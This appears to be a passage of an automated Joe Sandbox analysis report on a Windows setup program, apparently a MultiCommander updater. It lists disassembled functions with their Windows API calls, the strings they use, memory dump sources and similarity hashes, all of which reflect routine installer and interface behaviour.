                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 0-3907804496
                                                                                                                          • Opcode ID: 647b15470c9aae3d9a4e1582966d706b7bd45dab413430ca8ede3328f37de158
                                                                                                                          • Instruction ID: 6bf2577da805ebe1498c5e774d66f278b568438ab16e05cf14990dd9ad367180
                                                                                                                          • Opcode Fuzzy Hash: 647b15470c9aae3d9a4e1582966d706b7bd45dab413430ca8ede3328f37de158
                                                                                                                          • Instruction Fuzzy Hash: 54B13570A04209AFDF15EFA9C8C0BBE7BB5BF45318F148259E4199B292C7709E41DB78
                                                                                                                          Function 00C3110B Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 209libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 00C3112D
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 00C31162
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CloseGestureInfoHandle), ref: 00C3118A
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00C31216
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$ClientHandleModuleScreen
                                                                                                                          • String ID: CloseGestureInfoHandle$GetGestureInfo$user32.dll
                                                                                                                          • API String ID: 471820996-2905070798
                                                                                                                          • Opcode ID: ac37991b42577f1f9443d7ea97ada269b96c8a1dbb5fa93a53a5e0242df804c9
                                                                                                                          • Instruction ID: 9ec1b4336de3f479a17f2d4da948b15bd82ecc4fcf853f391405b6391710f6f1
                                                                                                                          • Opcode Fuzzy Hash: ac37991b42577f1f9443d7ea97ada269b96c8a1dbb5fa93a53a5e0242df804c9
                                                                                                                          • Instruction Fuzzy Hash: 1881AB74610616EFCB15DF69E988AADBBB5FF08350B044169E81693B60DB72EE10DF80
                                                                                                                          Function 00C37B67 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CheckMenuItem.USER32(?,?,00000400), ref: 00C37B96
                                                                                                                            • Part of subcall function 00C3D4F6: GetWindowTextW.USER32(?,?,00000100), ref: 00C3D554
                                                                                                                            • Part of subcall function 00C3D4F6: lstrcmpW.KERNEL32(?,00000001), ref: 00C3D566
                                                                                                                            • Part of subcall function 00C3D4F6: SetWindowTextW.USER32(?,00000001), ref: 00C3D572
                                                                                                                          • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 00C37BB1
                                                                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00C37BCE
                                                                                                                          • SetMenuItemBitmaps.USER32(?,?,00000400,00000000,00000000), ref: 00C37C3B
                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C37C8B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMenu$MessageSendTextWindow$BitmapsCheckInfolstrcmp
                                                                                                                          • String ID: 0$@
                                                                                                                          • API String ID: 72408025-1545510068
                                                                                                                          • Opcode ID: 1a907b0f63213bc0610ce97f1b23001f3b4bcb84e62e711204e3a686f6d3ccb7
                                                                                                                          • Instruction ID: bfb57c661df9524489b6c20df9795be2ad3c0256b8790e0c447240763db982b0
                                                                                                                          • Opcode Fuzzy Hash: 1a907b0f63213bc0610ce97f1b23001f3b4bcb84e62e711204e3a686f6d3ccb7
                                                                                                                          • Instruction Fuzzy Hash: 5941DCB1624214AFCB349F65EC08FAABBB9FF44340F108229F91A9B591C770ED41CB90
                                                                                                                          Function 00C16056 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 114COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C16060
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00C160B2
                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00C16136
                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C16157
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesCreateDirectoryFileH_prolog3_PathTemp
                                                                                                                          • String ID: Failed to create temp folder...$MUTemp$Temp folder is not a folder. Aborting...
                                                                                                                          • API String ID: 1902444491-3648179290
                                                                                                                          • Opcode ID: debd15f5e2b8917fbe8b3e4f42dd4b3263692b4250b600eae2dcf9475a810131
                                                                                                                          • Instruction ID: 62556b7cc55562e54dcfa9a9e767e7959e235c26f05f7cf639a207161fd92398
                                                                                                                          • Opcode Fuzzy Hash: debd15f5e2b8917fbe8b3e4f42dd4b3263692b4250b600eae2dcf9475a810131
                                                                                                                          • Instruction Fuzzy Hash: 3B4151B1910128AADF20AB60DC9DAEE73B8AF15744F1401E9F409E6191DB349F84EFA1
                                                                                                                          Function 00C17C6F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C17C76
                                                                                                                          • _strlen.LIBCMT ref: 00C17C93
                                                                                                                          • _strlen.LIBCMT ref: 00C17CD6
                                                                                                                          • GetFileAttributesW.KERNEL32(0000003C,00000000,00000000,0000003C,00C170E9,?,?), ref: 00C17D1A
                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00C17D3B
                                                                                                                            • Part of subcall function 00C03869: MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,?,?), ref: 00C0388C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File_strlen$AttributesByteCharH_prolog3_MoveMultiWide
                                                                                                                          • String ID: FAILED to Renamed file : "%s" => "%s"$Renamed file : "%s" => "%s"
                                                                                                                          • API String ID: 3337506382-2758536607
                                                                                                                          • Opcode ID: a456473090025592335b40dbf64f71c7b8a233e4697db4ceae803c3a688ba63a
                                                                                                                          • Instruction ID: 2ba86b59aaedc9fdb3dbbc506e47352cc37c384fb67ee241a9c7b66248ec8f3c
                                                                                                                          • Opcode Fuzzy Hash: a456473090025592335b40dbf64f71c7b8a233e4697db4ceae803c3a688ba63a
                                                                                                                          • Instruction Fuzzy Hash: 1F316B72E04208DFCB10EBA5D8559DEBBB8FF49710F144226F411BB191DB309E86EBA1
                                                                                                                          Function 00C1E2A8 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 91COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_
                                                                                                                          • String ID: Error : %s$Failed to download %s (HTTP Status code : %d)$Failed to download %s (Operation : %d, Error code %d)$MultiCommander$MultiUpdate$Version information
                                                                                                                          • API String ID: 2427045233-607879564
                                                                                                                          • Opcode ID: c8642f1fc4ef75467dbc43d468081dd918a167aeb949b908a27a101691ddedc1
                                                                                                                          • Instruction ID: 8079b2da1bb9ded2a289c7b889bde5787c2763738f9c51f45005a8a9e998acce
                                                                                                                          • Opcode Fuzzy Hash: c8642f1fc4ef75467dbc43d468081dd918a167aeb949b908a27a101691ddedc1
                                                                                                                          • Instruction Fuzzy Hash: B821D2B1A00114ABDB14AAA5CC95CFE76A8EF16310F488069FC25E7192DB34DE85F761
                                                                                                                          Function 00C1ED6C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • OutputDebugStringW.KERNEL32(raising exception,00CB94E0,00000020,00C1FE20,?), ref: 00C1ED8D
                                                                                                                          • RaiseException.KERNEL32(80000003,00000000,00000000,00000000), ref: 00C1ED9B
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C1EDC5
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,?,00000000,?), ref: 00C1EE43
                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 00C1EE4A
                                                                                                                          • MiniDumpWriteDump.DBGHELP(00000000,?,00000000,?,00000000,?), ref: 00C1EE51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$DumpProcess$DebugExceptionMiniOutputRaiseStringThreadWrite
                                                                                                                          • String ID: raising exception
                                                                                                                          • API String ID: 4056924314-2279324606
                                                                                                                          • Opcode ID: f0294a367da0ab187ed7cd71085dda10de50b8fef53f0fabe91b007ae7f7fd20
                                                                                                                          • Instruction ID: 69b6e5e503d9dfd6aedaa16d0743ad89b5a43d01d86649476b0f7b235579a33d
                                                                                                                          • Opcode Fuzzy Hash: f0294a367da0ab187ed7cd71085dda10de50b8fef53f0fabe91b007ae7f7fd20
                                                                                                                          • Instruction Fuzzy Hash: D22186B1A002199FDF148FA9999CAFD7AB4FF06754F10012EED11E7290C7318E40EB65
                                                                                                                          Function 00C21408 Relevance: 12.3, APIs: 8, Instructions: 266windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C21412
                                                                                                                            • Part of subcall function 00C21D8A: IsWindow.USER32(00000000), ref: 00C21D94
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 00C214B4
                                                                                                                          • GetParent.USER32(00000000), ref: 00C21704
                                                                                                                          • IsWindow.USER32(00000000), ref: 00C21719
                                                                                                                          • SendMessageW.USER32(00000000,0000004E,00000000,?), ref: 00C21751
                                                                                                                            • Part of subcall function 00C21C56: __EH_prolog3.LIBCMT ref: 00C21C5D
                                                                                                                          • GetParent.USER32(?), ref: 00C217A0
                                                                                                                          • IsWindow.USER32(?), ref: 00C217B5
                                                                                                                          • SendMessageW.USER32(?,0000004E,00000000,?), ref: 00C217E1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$MessageParentSend$AttributesFileH_prolog3H_prolog3_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4106875604-0
                                                                                                                          • Opcode ID: 3b5e54c0f4c55f7e792983cbc41939c4273bb5f5739a1a9d8f96ee919b734ef5
                                                                                                                          • Instruction ID: c05e5bc5ccce088cafb096a693eea6a52e8e7f75794114e2d432458710321f4c
                                                                                                                          • Opcode Fuzzy Hash: 3b5e54c0f4c55f7e792983cbc41939c4273bb5f5739a1a9d8f96ee919b734ef5
                                                                                                                          • Instruction Fuzzy Hash: 50B18BB1910529AFDB24EB60CC99BEDB77AAF94300F0441D9E409A71A1DF31AF94DF90
                                                                                                                          Function 00C0E8D1 Relevance: 12.2, APIs: 8, Instructions: 191COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateSolidBrush.GDI32(?), ref: 00C0E905
                                                                                                                          • FillRect.USER32(?,?,00000000), ref: 00C0E936
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00C0E93D
                                                                                                                          • CreatePen.GDI32(00000000,00000002,?), ref: 00C0EAC6
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00C0EAD3
                                                                                                                          • Ellipse.GDI32(?,?,?,?,?), ref: 00C0EAF7
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00C0EB02
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00C0EB09
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteSelect$BrushEllipseFillRectSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1754616435-0
                                                                                                                          • Opcode ID: 59f63eb87fca0605b04f66486863823dbf0b0227bccc683308b999f6db226365
                                                                                                                          • Instruction ID: 5330b8a0f99e58fb19ba9db96c7a83051695fea2b4ef5d860e5f9bf45dfcec8c
                                                                                                                          • Opcode Fuzzy Hash: 59f63eb87fca0605b04f66486863823dbf0b0227bccc683308b999f6db226365
                                                                                                                          • Instruction Fuzzy Hash: 17716F71918B419FC302CF38C89595BBBE5BFDA294F148B2EF485A7261E731D846CB41
                                                                                                                          Function 00C3E571 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00C3E5CA
                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,00C3E4F3,?,00000000,?,?,00C0842C,?,?,00C08787,00000000,?,?,?,80070057), ref: 00C3E5DB
                                                                                                                          • TlsGetValue.KERNEL32(?,?,00000000,?,?,00C0842C,?,?,00C08787,00000000,?,?,?,80070057,?,00C2DC12), ref: 00C3E5F7
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000000), ref: 00C3E660
                                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 00C3E69F
                                                                                                                          • LeaveCriticalSection.KERNEL32(00C087B5,?,00000000,?,?,00C0842C,?,?,00C08787,00000000,?,?,?,80070057,?,00C2DC12), ref: 00C3E6BD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSectionValue$AllocEnterH_prolog3_catchLeaveLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3140444358-0
                                                                                                                          • Opcode ID: 54e424511e03f40b1f1a179f18c350940e7978756ef664f9c67494bed6cce346
                                                                                                                          • Instruction ID: a5b0d4796560bd0b828c3e48cff4b6541b47937f02034b494941547797c8f9b7
                                                                                                                          • Opcode Fuzzy Hash: 54e424511e03f40b1f1a179f18c350940e7978756ef664f9c67494bed6cce346
                                                                                                                          • Instruction Fuzzy Hash: 3C41BF7121061A9FDB25AF29C889A6EBBB5FF54315F148029F81ADB6A1D730ED00DF90
                                                                                                                          Function 00C3955D Relevance: 12.1, APIs: 8, Instructions: 64memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00C39571
                                                                                                                          • lstrcmpW.KERNEL32(00000000,?), ref: 00C3958A
                                                                                                                          • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 00C3959F
                                                                                                                          • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C395BF
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C395C7
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00C395D5
                                                                                                                          • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00C395E6
                                                                                                                          • ClosePrinter.WINSPOOL.DRV(?), ref: 00C395FE
                                                                                                                            • Part of subcall function 00C3D4C3: GlobalFlags.KERNEL32(?), ref: 00C3D4D0
                                                                                                                            • Part of subcall function 00C3D4C3: GlobalUnlock.KERNEL32(?), ref: 00C3D4DE
                                                                                                                            • Part of subcall function 00C3D4C3: GlobalFree.KERNEL32(?), ref: 00C3D4EA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 168474834-0
                                                                                                                          • Opcode ID: 19a1cb7cba16947f5a1d9f25fee17cd0545aae2c594a69f5e624be386c20f1b9
                                                                                                                          • Instruction ID: d0b9a25c246a1891337ec4e731b2fbf65cbd014a691e31784451d7190b20df35
                                                                                                                          • Opcode Fuzzy Hash: 19a1cb7cba16947f5a1d9f25fee17cd0545aae2c594a69f5e624be386c20f1b9
                                                                                                                          • Instruction Fuzzy Hash: 7D1160B1510609FFEB226FA0DD8AEAE7EACFF04744F00052AB61695071DA71DE54EB20
                                                                                                                          Function 00C7007F Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00C7019E
                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00C702A9
                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00C70417
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                          • String ID: csm$csm$csm
                                                                                                                          • API String ID: 1206542248-393685449
                                                                                                                          • Opcode ID: 3f1493223013a40efe858b85d235a8c507ca323c382ad872561b65eec2393f7c
                                                                                                                          • Instruction ID: acd98fe31632affd484bc0241fb70a7214d933413359750625185a6a2ac571c8
                                                                                                                          • Opcode Fuzzy Hash: 3f1493223013a40efe858b85d235a8c507ca323c382ad872561b65eec2393f7c
                                                                                                                          • Instruction Fuzzy Hash: 0FB1A271800209DFCF24DFA4D8819AEBBB5FF14310F64856AF9296B212C770EA52DF91
                                                                                                                          Function 00C36637 Relevance: 10.7, APIs: 7, Instructions: 195windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C3663E
                                                                                                                          • _memcpy_s.LIBCMT ref: 00C3674F
                                                                                                                          • CoTaskMemFree.OLE32(?,000000FF), ref: 00C36777
                                                                                                                          • GetParent.USER32(?), ref: 00C367DD
                                                                                                                          • SendMessageW.USER32(?,00000464,00000104,00000000), ref: 00C36806
                                                                                                                          • GetParent.USER32(?), ref: 00C3682C
                                                                                                                          • SendMessageW.USER32(?,00000465,00000104,00000000), ref: 00C36852
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
